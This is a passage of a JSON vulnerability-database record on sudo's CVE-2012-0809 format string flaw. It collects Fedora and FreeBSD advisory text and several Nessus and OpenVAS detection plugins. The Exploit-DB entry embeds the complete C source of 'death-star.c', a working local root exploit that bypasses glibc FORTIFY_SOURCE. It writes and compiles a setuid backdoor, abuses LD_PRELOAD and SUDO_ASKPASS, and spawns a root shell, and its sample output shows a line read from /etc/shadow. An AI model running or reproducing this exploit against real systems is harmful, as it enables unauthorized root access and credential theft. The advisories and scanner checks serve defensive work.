value:\"http://bugs.gentoo.org/show_bug.cgi?id=401533\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201203-06.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-admin/sudo\", unaffected: make_list(\"ge 1.8.3_p2\", \"rge 1.7.4_p5\"), vulnerable: make_list(\"lt 1.8.3_p2\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T00:43:28", "description": "sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass. CVE-2012-0809. Local exploit for linux platform", "published": "2013-05-01T00:00:00", "type": "exploitdb", "title": "sudo 1.8.0-1.8.3p1 sudo_debug - Root Exploit + glibc FORTIFY_SOURCE Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "EDB-ID:25134", "href": "https://www.exploit-db.com/exploits/25134/", "sourceData": "/*\r\n death-star.c\r\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\r\n by aeon - http://infosecabsurdity.wordpress.com/\r\n\r\n This PoC exploits:\r\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via \"nargs\" integer overflow\r\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 \"sudo_debug\" format string\r\n \r\n Tested on:\r\n - Fedora core 16 verne\r\n - glibc 2.14.90.14 release\r\n - sudo 1.8.1p2\r\n \r\n Notes:\r\n - This exploit actually turned out very reliable :-) \r\n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\r\n or a libc function pointer so you dont write to disk. I wont be releasing that version :-)\r\n\r\n References and thanks too:\r\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\r\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\r\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\r\n - \"A Eulogy for Format Strings\" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\r\n\r\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\r\n[aeon@localhost tmp]$ ./death-star \r\n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\r\n[+] Found vuln glibc version: 2.14.90\r\n[+] Found a vuln sudo version: 1.8.1\r\n[+] Writing backdoor: e.c\r\n[+] Compiling backdoor: e\r\n[+] Writing SUDO_ASKPASS file: e.sh\r\n[+] Press enter when ready...\r\n\r\n< -------------- REMOVED -------------->\r\n\r\n A\u010f\u017c\u02dd\u001bAF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001f\u0002' from LD_PRELOAD cannot be preloaded: ignored.\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: sudo_mode 1081383169\r\nSorry, try again.\r\nSorry, try again.\r\nSorry, try again.\r\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\r\n %1073886251%21372736 %: policy plugin returns 1081402445\r\n[+] Getting root..!\r\n[+] Cleaning system.\r\n[+] Launching root shell!\r\nsh-4.2# id; uname -a\r\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\nLinux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\r\nsh-4.2# head -n1 /etc/shadow\r\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\r\nsh-4.2#\r\n*/\r\n\r\n#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n\r\n#define OFFSET 65000\r\n#define NUM_THREADS 0\r\n\r\n/* files that we create on disk */\r\n#define BACKDOOR \"e.c\"\r\n#define BD_COMPILED \"e\"\r\n#define SUDO_ASKPASS \"e.sh\"\r\n\r\nextern char **environ;\r\nstruct utsname ver;\r\n\r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n\r\n/* hardcoded path to sudo */\r\nconst char sudo[] = \"/usr/bin/sudo\\0\";\r\nchar s_version[20];\r\n\r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {\"1.8.0\"},\r\n {\"1.8.1\"},\r\n {\"1.8.2\"},\r\n {\"1.8.3\"}\r\n};\r\n\r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {\"2.14.90\"},\r\n};\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf(\"[+] Targeting release: %s\\n\", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf(\"[+] Press enter when ready...\");\r\n scanf(\"%c\", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n\r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n\r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf(\"[-] An error occurred while forking sudo\\n\");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n\r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\r\n fp = popen(sudo_ver_cmd, \"r\");\r\n\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\r\n \"#include <stdlib.h>\\r\\n\"\r\n \"int main(int argc, char **argv){\\r\\n\"\r\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\r\n \" setresuid(0,0,0);\\r\\n\"\r\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\r\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\r\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\r\n \" system(\\\"/bin/sh\\\");\\r\\n\"\r\n \" exit(0);\\r\\n\"\r\n \"}\\r\\n\";\r\n\r\n FILE *fp = fopen(BACKDOOR,\"wb\");\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\r\n }\r\n\r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\r\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\r\n fp = popen(compile_bd, \"r\");\r\n\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\r\n returnval = -1;\r\n }\r\n\r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,\"w\");\r\n\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\r\n }\r\n\r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n\r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n\r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\r\n\r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n\r\nvoid *kill_sudo(){\r\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\r\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\r\n\r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n\r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"SUDO_ASKPASS\");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25134/"}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0809"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2012-01-31T22:00:15", "published": "2012-01-31T22:00:15", "id": "FEDORA:C84D220DCB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: sudo-1.8.3p1-2.fc16", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0809", "CVE-2012-2337"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2012-07-12T18:56:05", "published": "2012-07-12T18:56:05", "id": "FEDORA:4755F20BEA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: sudo-1.8.3p1-3.fc16", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:09:52", "description": " - fixed CVE-2012-0809\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-02-01T00:00:00", "title": "Fedora 16 : sudo-1.8.3p1-2.fc16 (2012-1028)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "modified": "2012-02-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:sudo", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-1028.NASL", "href": "https://www.tenable.com/plugins/nessus/57757", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-1028.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57757);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0809\");\n script_bugtraq_id(51719);\n script_xref(name:\"FEDORA\", value:\"2012-1028\");\n\n script_name(english:\"Fedora 16 : sudo-1.8.3p1-2.fc16 (2012-1028)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - fixed CVE-2012-0809\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=784443\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072651.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f66dd444\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"sudo-1.8.3p1-2.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:05", "description": "sudo was prone to a format string vulnerability", "edition": 14, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : sudo (openSUSE-2012-73)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:sudo-debuginfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:sudo-devel", "p-cpe:/a:novell:opensuse:sudo", "p-cpe:/a:novell:opensuse:sudo-debugsource"], "id": "OPENSUSE-2012-73.NASL", "href": "https://www.tenable.com/plugins/nessus/74791", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-73.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74791);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0809\");\n\n script_name(english:\"openSUSE Security Update : sudo (openSUSE-2012-73)\");\n script_summary(english:\"Check for the openSUSE-2012-73 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"sudo was prone to a format string vulnerability\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=743300\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-1.8.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debuginfo-1.8.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debugsource-1.8.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-devel-1.8.2-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo / sudo-debugsource / sudo-devel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:46:07", "description": "Todd Miller reports :\n\nSudo 1.8.0 introduced simple debugging support that was primarily\nintended for use when developing policy or I/O logging plugins. The\nsudo_debug() function contains a flaw where the program name is used\nas part of the format string passed to the fprintf() function. The\nprogram name can be controlled by the caller, either via a symbolic\nlink or, on some systems, by setting argv[0] when executing sudo.\n\nUsing standard format string vulnerability exploitation techniques it\nis possible to leverage this bug to achieve root privileges.\n\nExploitation of the bug does not require that the attacker be listed\nin the sudoers file. As such, we strongly suggest that affected sites\nupgrade from affected sudo versions as soon as possible.", "edition": 21, "published": "2012-01-31T00:00:00", "title": "FreeBSD : sudo -- format string vulnerability (7c920bb7-4b5f-11e1-9f47-00e0815b8da8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809"], "modified": "2012-01-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:sudo", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7C920BB74B5F11E19F4700E0815B8DA8.NASL", "href": "https://www.tenable.com/plugins/nessus/57739", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57739);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-0809\");\n\n script_name(english:\"FreeBSD : sudo -- format string vulnerability (7c920bb7-4b5f-11e1-9f47-00e0815b8da8)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Todd Miller reports :\n\nSudo 1.8.0 introduced simple debugging support that was primarily\nintended for use when developing policy or I/O logging plugins. The\nsudo_debug() function contains a flaw where the program name is used\nas part of the format string passed to the fprintf() function. The\nprogram name can be controlled by the caller, either via a symbolic\nlink or, on some systems, by setting argv[0] when executing sudo.\n\nUsing standard format string vulnerability exploitation techniques it\nis possible to leverage this bug to achieve root privileges.\n\nExploitation of the bug does not require that the attacker be listed\nin the sudoers file. As such, we strongly suggest that affected sites\nupgrade from affected sudo versions as soon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.gratisoft.us/sudo/alerts/sudo_debug.html\"\n );\n # https://vuxml.freebsd.org/freebsd/7c920bb7-4b5f-11e1-9f47-00e0815b8da8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?52b68937\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"sudo>=1.8.0<1.8.3_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:53:30", "description": "The remote host is affected by the vulnerability described in GLSA-201203-06\n(sudo: Privilege escalation)\n\n Two vulnerabilities have been discovered in sudo:\n When the sudoers file is configured with a Runas group, sudo does not\n prompt for a password when changing to the new group (CVE-2011-0010).\n A format string vulnerability exists in the 'sudo_debug()' function\n (CVE-2012-0809).\n \nImpact :\n\n A local attacker could possibly gain the ability to run arbitrary\n commands with the privileges of other users or groups, including root.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2012-03-06T00:00:00", "title": "GLSA-201203-06 : sudo: Privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0809", 